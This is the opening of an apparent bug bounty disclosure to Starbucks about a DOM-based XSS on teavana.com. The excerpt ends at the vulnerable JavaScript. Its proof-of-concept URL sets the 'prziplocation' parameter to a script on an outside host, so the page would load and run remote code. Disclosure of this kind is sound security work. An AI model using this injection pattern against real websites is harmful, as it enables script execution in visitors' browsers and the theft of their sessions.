Starbucks: DOM XSS on teavana.com via "pr_zip_location" parameter

Hello Starbucks team,, I've discovered DOM XSS on teavana.com involving prziplocation URL parameter. PoC: http://www.teavana.com/us/en/tea/green-tea/winterberry-tea-blend-32601.html?prziplocation=//whitehat-hacker.com/xss.j? Works in all major browsers. Vulnerable code is in full.js: js var DR =...